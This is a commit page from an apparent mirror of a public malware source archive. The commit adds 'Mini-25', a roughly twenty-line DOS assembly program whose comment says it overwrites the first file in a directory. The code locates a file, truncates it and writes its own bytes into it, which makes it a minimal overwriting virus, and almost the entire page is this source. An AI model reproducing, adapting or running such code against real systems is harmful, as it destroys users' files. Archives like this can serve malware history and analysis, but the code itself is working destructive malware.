mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
Add files via upload
This commit is contained in:
@@ -0,0 +1,20 @@
|
||||
;
|
||||
; Mini-25
|
||||
;
|
||||
; Overwrites the first file in a directory
|
||||
|
||||
|
||||
FNAM Equ 09eh
|
||||
|
||||
Db '*.*',0
|
||||
Main: Mov Ah,4eh
|
||||
Mov Dx,Cx
|
||||
Int 21h
|
||||
Mov Ah,3ch
|
||||
Lea Dx,FNAM
|
||||
On2: Int 21h
|
||||
Mov Bh,40h
|
||||
Xchg Cx,Dx
|
||||
Xchg Ax,Bx
|
||||
Jmp On2
|
||||
Length Equ $-Main
|
||||
Reference in New Issue
Block a user